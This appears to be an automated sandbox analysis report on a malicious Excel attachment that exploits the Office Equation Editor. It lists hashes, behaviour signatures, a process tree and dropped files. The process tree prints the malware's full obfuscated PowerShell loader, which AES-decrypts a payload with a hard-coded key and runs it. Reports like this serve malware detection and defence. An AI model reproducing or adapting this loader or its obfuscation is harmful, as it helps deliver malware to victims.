Analysis

max time kernel: 144s
max time network: 118s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
submitted: 26/07/2024, 11:01
Static task: static1

Behavioral task: behavioral1
  Sample: AWD 490104998518.xls
  Resource: win7-20240704-en

Behavioral task: behavioral2
  Sample: AWD 490104998518.xls
  Resource: win10v2004-20240709-en
General

Target: AWD 490104998518.xls
Size: 1.2MB
MD5: f63c009bccbc4d8d26d162a168feaeb1
SHA1: fa8ab13582703932f968a31e6cc0973e45ca43e0
SHA256: f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3
SHA512: 56a099036928c0af89d6a4cde7977cf5f3a5626a028aabea8a4dc590dd582c395042ae2c4f05b8085b81a9d19fb12f18beea0fe145712f057ffc12028e063395
SSDEEP: 24576:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5Kj1G8RjM78quuH6OBrNoDgYEMuFh:9Hr9+FZQNw1Q1l5oGYjMhuu3BRo0Yr+
Malware Config
Signatures
Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  11    1708  EQNEDT32.EXE
  12    1028  powershell.exe

Abuses OpenXML format to download file from external location
  pid   Process
  1028  powershell.exe

Drops file in System32 directory (1 IoCs)
  description                   ioc                                                                                                                           Process
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EXCEL.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WINWORD.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EQNEDT32.EXE
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry (2 TTPs, 1 IoCs)
  description  ioc                                                                 Process
  Key opened   \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor  EXCEL.EXE

Launches Equation Editor (1 TTPs, 1 IoCs)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
  pid   Process
  1708  EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid   Process
  1760  EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  1028  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description                 pid   Process
  Token: SeDebugPrivilege     1028  powershell.exe
  Token: SeShutdownPrivilege  2536  WINWORD.EXE

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   Process
  1760  EXCEL.EXE
  1760  EXCEL.EXE
  1760  EXCEL.EXE
  2536  WINWORD.EXE
  2536  WINWORD.EXE

Suspicious use of WriteProcessMemory (12 IoCs)
  description                       pid   Process       procid_target
  PID 1708 wrote to memory of 780   1708  EQNEDT32.EXE  33
  PID 1708 wrote to memory of 780   1708  EQNEDT32.EXE  33
  PID 1708 wrote to memory of 780   1708  EQNEDT32.EXE  33
  PID 1708 wrote to memory of 780   1708  EQNEDT32.EXE  33
  PID 780 wrote to memory of 1028   780   WScript.exe   34
  PID 780 wrote to memory of 1028   780   WScript.exe   34
  PID 780 wrote to memory of 1028   780   WScript.exe   34
  PID 780 wrote to memory of 1028   780   WScript.exe   34
  PID 2536 wrote to memory of 1784  2536  WINWORD.EXE   36
  PID 2536 wrote to memory of 1784  2536  WINWORD.EXE   36
  PID 2536 wrote to memory of 1784  2536  WINWORD.EXE   36
  PID 2536 wrote to memory of 1784  2536  WINWORD.EXE   36
Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\AWD 490104998518.xls"
  PID: 1760
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
  PID: 2536
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
    PID: 1784

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  PID: 1708
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creatednewwaterbottleform.vBS"
    PID: 780
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
      PID: 1028
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7BD7F3F9-6CF2-4A4A-BC63-46B9EAC2ED1D}.FSD
  Filesize: 128KB
  MD5: 50c03fa16fdf5a8dc024333c4d6322f8
  SHA1: 222367043a1b6afc0a895a6e56f6a63d598aac86
  SHA256: 1b2f97568ba5a2edc394f7106fb2549f2db3f26334fe5a816f12b1c2915e0ae8
  SHA512: 8edf05a191797c4be178334ee390794a52565bf9e923367f5bd6e7052e9fc34f2e48dd94913237661dc3b85b57fa67ca53bbe75e29a11a4388fa5045eb4e77ff

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
  Filesize: 128KB
  MD5: 06affedb3acc140be7fa458b6485a664
  SHA1: 44394b6dc8abdf00f3ac4e38ea52c807b45a655b
  SHA256: 454678244de989a1c49b4bfdbc4581c864364f81dedc3f97b39a0ef8c232b18a
  SHA512: 697e584f399a1608daa92b41a761cbea345356d91b7119bb7726937b424747664df6802e86820d56fb66c6a83526a64b02e7ce58a596102a163af5bee6685b22

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DB1EAE14-EBAB-4E09-A703-847628820889}.FSD
  Filesize: 128KB
  MD5: 1d480e311ca4db15b0d02303767869ba
  SHA1: 86a1d83bc1ae7513c54a8f73aa8127a6a414c004
  SHA256: 0840c3e53855eb156e0f4c0d3d0923e78ce0da65409f974723cd413ec00a4868
  SHA512: 3dcea1b828e006217439476780c09d7cd8c17d5820419ad3ba45df5b2e5c0714c03c9068d41723c8fa26979975bd71b6d596104653d150da8a73e25c9e578168

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc
  Filesize: 83KB
  MD5: e03f3290788de4d7a103f16b780b3cce
  SHA1: c220e79a2714ed59f4d7b1d0a4f6c63a03772ea6
  SHA256: db4fed8fb3c35582ade2fa57a5866ec7795e94bff34f004f66d15233d1a2fcd8
  SHA512: 9372b124ecb895a5c7672d75d17eb3ea3d91fab5ed675aa82090d8d00c15cb4477553342a356c4f8616869c2987105e6468bb2a912196dab055e06e34ad24b63

(no path recorded)
  Filesize: 128KB
  MD5: 75a65fd301e7502f04f4e1283667ec0f
  SHA1: 880133e60c726ba309f61c970678da2fcefb7346
  SHA256: 6722282816329e4c984c07ce9fc8ef5253c1b568121fe8f65fb4c21c1fa58301
  SHA512: ef8f8d6fca21f478629089b98661590e6f8960291385a24e511846cf232f54aadeccb6d28578bcd6129a85887b1fa02039386b620b696ccfbd47cc4f65fc7eaa

(no path recorded)
  Filesize: 20KB
  MD5: acf86365f0b275c45dde8e7b3b4310ff
  SHA1: fc440f05f848894b685ea253a3cac557274b94e7
  SHA256: 9b71bb48753fc95d6afb442ed1376ce45662e84c06b2ebebb07938e209b017d5
  SHA512: b14fdf898bd95b4f42ae3657122340a958c16eae64b934e9641818174fdaa63110c26de9d6ce59d201d5b6e34a641c5e15aa94a750a99703af888651dc075859

(no path recorded)
  Filesize: 409KB
  MD5: 94734cb139b6b9025fd8a1acc56027db
  SHA1: b385368bcaadaca073849a413660b68e690ffba5
  SHA256: 7dde4d5f845dbb2a078f6d0a290472d22cc845c6d6927cc0ada645ce050c7b08
  SHA512: 58e0064f4b304b5503c4a7e689d96cc62bac4bc8ee76d39fede408b9e777b9602334dad4e1570fa0b9e0c363e7d8ee419a41d4da02493d174d61f96acca4053f